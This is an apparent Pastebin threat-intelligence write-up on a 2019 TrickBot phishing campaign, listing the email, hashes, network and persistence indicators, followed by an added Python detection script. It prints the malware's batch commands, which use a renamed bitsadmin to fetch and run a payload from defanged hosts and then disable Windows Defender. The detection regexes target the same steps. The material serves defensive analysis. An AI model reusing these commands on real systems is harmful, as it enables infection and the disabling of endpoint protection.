#trickbot_070319

VRad Mar 10th, 2019 (edited)
#IOC #OptiData #VR #trickbot #W97M #AutoClose #BAT #BITS

https://pastebin.com/Vt02288z

previous contact:
06/02/19    https://pastebin.com/70KhU3a4
05/10/18    https://pastebin.com/75KNqwCf
02/10/18    https://pastebin.com/fm5Ug69G
24/09/18    https://pastebin.com/LjuNyGfn

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_trickbot_051018/
https://myonlinesecurity.co.uk/fake-paychex-tax-verification-documents-delivers-trickbot/
https://github.com/DidierStevens/DidierStevensSuite/blob/master/vba.yara

attack_vector
--------------
email attach .doc > macro_AutoClose > 4 bat > BITS > GET > AppData\Roaming\wnetwork\*.exe

email_headers
--------------
Received: from paychex.email ([95.211.163.2])
Received: by paychex.email for <user00@org88.victim0.com>;
(envelope-from <J.Clark-user00=org88.victim0.com@paychex.email>)
Subject:  RE: Tax verification documents
From: "Jeff Clark - Paychex" <J.Clark@paychex.email>
Date: Thu, 7 Mar 2019 14:33:37 -0500
To: user00@org88.victim0.com

files
--------------
SHA-256 a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625
File name   Verification_Documents.doc      [Composite Document File V2 Document, Little Endian]
File size   100.5 KB

SHA-256 da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd
File name   za.ebali                [PE32 executable (GUI) Intel 80386, for MS Windows]
File size   245 KB

activity
**************
Yahhop1.bat
--------------
cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\@n10FGA.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat

Yahhop2.bat
--------------
cmd /r cmd /c ping -n 2 yasgold{.} com
if %errorlevel%==0 (set slomw=yasgold{.} com) else (set slomw=mitreart{.} com)

Yahhop3.bat
--------------
cmd /r cmd /c %temp%\@n10FGA /reset && %temp%\@n10FGA /CREATE /DOWNLOAD Taur && %temp%\@n10FGA /setNoProgressTimeout Taur 300 && %temp%\@n10FGA /setMinRetryDelay Taur 7 && %temp%\@n10FGA /ADDFILE Taur http://%slomw%/za.ebali %temp%\ebali.exe && %temp%\@n10FGA /SetSecurityFlags Taur 30 && %temp%\@n10FGA /SETMAXDOWNLOADTIME Taur 500 && %temp%\@n10FGA /SetPeerCachingFlags Taur 3 && %temp%\@n10FGA /RESUME Taur && timeout /t 147 /nobreak && %temp%\@n10FGA /COMPLETE Taur

Yahhop4.bat
--------------
cmd /r cmd /c timeout /t 5 /nobreak && %temp%\ebali.exe && del /f /q %temp%\Yahhop1.bat %temp%\Yahhop2.bat %temp%\Yahhop3.bat %temp%\Yahhop4.bat %temp%\Yahhop5.bat %temp%\@n10FGA.exe

@

PL_SRC:     http://yasgold{.} com/za.ebali
        http://mitreart{.} com/za.ebali

netwrk
--------------
http
185.56.145.142  yasgold{.} com      HEAD /za.ebali      HTTP/1.1        Microsoft BITS/7.5
116.203.16.95   ip.anysrc.net       GET /plain      HTTP/1.1        Mozilla/5.0
67.27.235.254   ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1   Microsoft-CryptoAPI/6.1

ssl
185.174.174.15
82.146.57.38
195.123.246.121

comp
--------------
svchost.exe 872 TCP localhost   49376   185.56.145.142  80  ESTABLISHED
svchost.exe 1688    TCP localhost   49377   116.203.16.95   80  ESTABLISHED
svchost.exe 1688    TCP localhost   49378   177.107.51.162  449 SYN_SENT
svchost.exe 1688    TCP localhost   49381   138.204.132.88  449 SYN_SENT
svchost.exe 1688    TCP localhost   49385   67.27.235.254   80  ESTABLISHED
svchost.exe 1688    TCP localhost   49384   185.174.174.15  443 ESTABLISHED
svchost.exe 1688    TCP localhost   49386   82.146.57.38    443 ESTABLISHED
svchost.exe 1688    TCP localhost   49389   195.123.246.121 443 ESTABLISHED

proc
--------------
1st
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\00JO0!l.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
C:\Windows\SysWOW64\cmd.exe /c copy /Y /V C:\Windows\system32\bitsadmin.exe C:\tmp\00JO0!l.exe
C:\Windows\SysWOW64\cmd.exe /r cmd /c ping -n 2 yasgold{.} com
C:\Windows\SysWOW64\cmd.exe /c ping -n 2 yasgold{.} com
C:\Windows\SysWOW64\PING.EXE -n 2 yasgold{.} com
C:\Windows\SysWOW64\cmd.exe  /r cmd /c C:\tmp\00JO0!l /reset
C:\Windows\SysWOW64\cmd.exe  /c C:\tmp\00JO0!l /reset
C:\tmp\00JO0!l  /reset

C:\tmp\00JO0!l  /CREATE /DOWNLOAD Taur
C:\tmp\00JO0!l  /setNoProgressTimeout Taur 300
C:\tmp\00JO0!l  /setMinRetryDelay Taur 7
C:\tmp\00JO0!l  /ADDFILE Taur http://yasgold{.} com/za.ebali C:\tmp\ebali.exe
C:\tmp\00JO0!l  /SetSecurityFlags Taur 30
C:\tmp\00JO0!l  /SETMAXDOWNLOADTIME Taur 500
C:\tmp\00JO0!l  /SetPeerCachingFlags Taur 3
C:\tmp\00JO0!l  /RESUME Taur
C:\Windows\SysWOW64\timeout.exe timeout  /t 147 /nobreak
C:\tmp\00JO0!l  /COMPLETE Taur

C:\Windows\SysWOW64\cmd.exe  /r cmd /c timeout /t 5 /nobreak
C:\tmp\ebali.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe

2nd
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\taskeng.exe {4A5E0F1F-7A3C-4339-A10A-8292EA54F4A0} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe

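Added example (not part of VRad's paste): a small Python triage script that flags the chain the activity and proc sections show when run over process command lines: bitsadmin.exe copied under a random name into the temp directory, BITS job switches issued from that renamed image, /ADDFILE fetching an executable, and the WinDefend / Set-MpPreference tampering. The sample input is constructed to mirror the entries above; the random file name and paths are the page's own, the download host is a placeholder.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample modelled on the proc section above (not a real log export).
# The host name is a placeholder; the renamed bitsadmin name and paths are the page's.
SAMPLE_PROCESS_LINES = [
    r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde',
    r'C:\Windows\SysWOW64\cmd.exe /c copy /Y /V C:\Windows\system32\bitsadmin.exe C:\tmp\00JO0!l.exe',
    r'C:\Windows\SysWOW64\PING.EXE -n 2 payload.example',
    r'C:\tmp\00JO0!l  /CREATE /DOWNLOAD Taur',
    r'C:\tmp\00JO0!l  /ADDFILE Taur http://payload.example/za.ebali C:\tmp\ebali.exe',
    r'C:\tmp\00JO0!l  /RESUME Taur',
    r'C:\tmp\ebali.exe',
    r'C:\Windows\system32\cmd.exe /c sc stop WinDefend',
    r'C:\Windows\system32\cmd.exe /c sc delete WinDefend',
    r'C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'C:\Windows\system32\svchost.exe -k netsvcs',
]

# bitsadmin.exe copied somewhere; group 1 is the destination path
COPY_BITSADMIN = re.compile(r'copy\b.*\\bitsadmin\.exe\s+(\S+)', re.I)
# bitsadmin job switches, wherever they are typed
BITS_SWITCHES = re.compile(r'/(create|addfile|resume|complete|setsecurityflags)\b', re.I)
# a BITS job that writes an executable to disk
ADDFILE_EXE = re.compile(r'/addfile\s+\S+\s+(https?://\S+)\s+(\S+\.exe)', re.I)
# Defender service removal and real-time protection disablement
DEFENDER_TAMPER = [
    re.compile(r'\bsc(\.exe)?\s+(stop|delete|config)\s+WinDefend\b', re.I),
    re.compile(r'Set-MpPreference\b.*-Disable\w+\s+\$true', re.I),
]


@dataclass
class Finding:
    rule: str
    line_no: int
    cmdline: str


def _basename(path: str) -> str:
    """Lower-cased file name without a trailing .exe (the chain runs '00JO0!l' without it)."""
    base = path.replace('/', '\\').rsplit('\\', 1)[-1].lower()
    return base[:-4] if base.endswith('.exe') else base


def image_name(cmdline: str) -> str:
    """Return the normalised image name of the launched process (quoted or bare path)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        image = cmdline[1:].split('"', 1)[0]
    else:
        image = cmdline.split()[0] if cmdline else ''
    return _basename(image)


def scan(lines):
    """Run the rules over an ordered list of process command lines."""
    findings = []
    renamed = set()  # names bitsadmin.exe was copied to earlier in the same list
    for n, line in enumerate(lines, 1):
        m = COPY_BITSADMIN.search(line)
        if m:
            renamed.add(_basename(m.group(1)))
            findings.append(Finding('bitsadmin_copied', n, line))
            continue
        img = image_name(line)
        if BITS_SWITCHES.search(line) and img != 'bitsadmin':
            rule = 'renamed_bitsadmin_used' if img in renamed else 'bits_switches_from_unknown_image'
            findings.append(Finding(rule, n, line))
        if ADDFILE_EXE.search(line):
            findings.append(Finding('bits_download_to_exe', n, line))
        for pat in DEFENDER_TAMPER:
            if pat.search(line):
                findings.append(Finding('defender_tamper', n, line))
                break
    return findings


def summarize(findings):
    """Count findings per rule, e.g. {'defender_tamper': 3, ...}."""
    return dict(Counter(f.rule for f in findings))


if __name__ == '__main__':
    for f in scan(SAMPLE_PROCESS_LINES):
        print(f'{f.rule:34} line {f.line_no}: {f.cmdline}')
    print(summarize(scan(SAMPLE_PROCESS_LINES)))
```

The copy rule has to run first and remember the destination, because every later BITS command in the page's chain comes from `C:\tmp\00JO0!l`, not from `bitsadmin.exe`; keying only on the image name would miss it. A real EDR export also carries the parent process, so the stronger signal (WINWORD.EXE spawning cmd.exe) can be added there; this flat list has no parent field, so the example does not pretend to check it.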
persist
--------------
\Windows Network
c:\users\operator\appdata\roaming\wnetwork\ebamj.exe    07.03.2019 18:12

drop
--------------
C:\tmp\VBE\MSForms.exd
C:\tmp\Yahhop1.bat      [removed]
C:\tmp\Yahhop2.bat      [removed]
C:\tmp\Yahhop3.bat      [removed]
C:\tmp\Yahhop4.bat      [removed]
C:\tmp\00JO0!l.exe      [removed]
C:\tmp\BIT7B59.tmp      [removed]
C:\tmp\ebali.exe

C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Users\operator\AppData\Roaming\wnetwork\Greenshot.ini
C:\Users\operator\AppData\Roaming\wnetwork\Data

# # #
https://www.virustotal.com/#/file/a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625/details
https://www.virustotal.com/#/file/da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd/details
https://analyze.intezer.com/#/analyses/b11279cb-4c9a-4e59-8605-e6a96c078034

VR

@